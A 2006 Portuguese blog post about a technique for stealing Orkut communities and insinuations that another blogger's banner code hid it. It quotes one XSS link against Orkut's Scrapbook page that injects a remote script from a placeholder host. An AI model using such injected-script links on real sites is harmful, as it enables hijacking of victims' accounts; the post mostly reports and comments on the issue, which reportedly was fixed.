Causos do cotidiano contados por mim mesmo

quinta-feira, novembro 30, 2006

Orkut


Li esse post no Cocadaboa um dia desses. É um post que ensina como roubar comunidades do orkut. Não testei pra ver se funciona, até porque eu não tenho perfil no orkut.


Dias depois, li esse outro post no Faz Sentido, onde ele cita o post do Cocadaboa.


Existe todo um passo a passo de como se faz para roubar a comunidade do alheio, e um dos passos é mandar um link para a vítima com o endereço abaixo, apenas mudando algumas coisas:


http://www.orkut.com/Scrapbook.aspx?na=%22%3B%7D%3B//--%3E%3C/script%3E%3Cscript%20src%3D%27http%3A//www.site.com/arquivo.js%27%3E%3C/script%3E%3C%21--



Não é meu interesse ensinar ninguém a fazê-lo, caso você tenha interesse, leia os posts que eu relacionei acima. O verdadeiro interesse desse post é o de mostrar a imagem abaixo, capturada do Faz Sentido.




Aparentemente normal. Você copia o endereço que tem abaixo do banner, coloca na sua página e linka um ótimo blog para seus leitores visitarem também. Mas estou achando o endereço da caixa de texto meio estranho. Meio parecido com aquele endereço lá do post sobre roubo de comunidades né?


Acho melhor eu ficar quieto. Tirem suas próprias conclusões.


PS: Já tem gente acusando o dono desse blog de roubar comunidades e deletá-las, mas não sou eu que vou dizer isso né?


[UPDATE]: O dono do Faz Sentido postou um esclarecimento no blog dele. Acho que vale a pena dar uma lida. É só clicar nesse link aqui.


[UPDATE 2]: Já virou polêmica! Não se fala de outra coisa no orkut. No Faz Sentido (acho que já linkei ele demais por aqui) a caixa de comentários está cheia de acusações, eu acabei de abrir um tópico no Fórum Blogueiros sobre o assunto. No cocadaboa está sendo informado que o erro já foi corrigido. Polêmica!!!


[UPDATE 3]: Não tem nada a ver com o post, mas pra eu não postar duas vezes no mesmo dia, venho por meio deste update, pedir para vocês visitarem o BBB4 e votar na vencedora da competição. Vencedora? Sim, vencedora, pois estou pedindo o voto de vocês para a Gabi. Cliquem aqui e votem! Não se esqueçam, o nome é Gabi.


PS: Ela falou que vai fazer umas fotos sensuais e um making of do ensaio se ganhar, então não deixem de votar nela!




blog comments powered by Disqus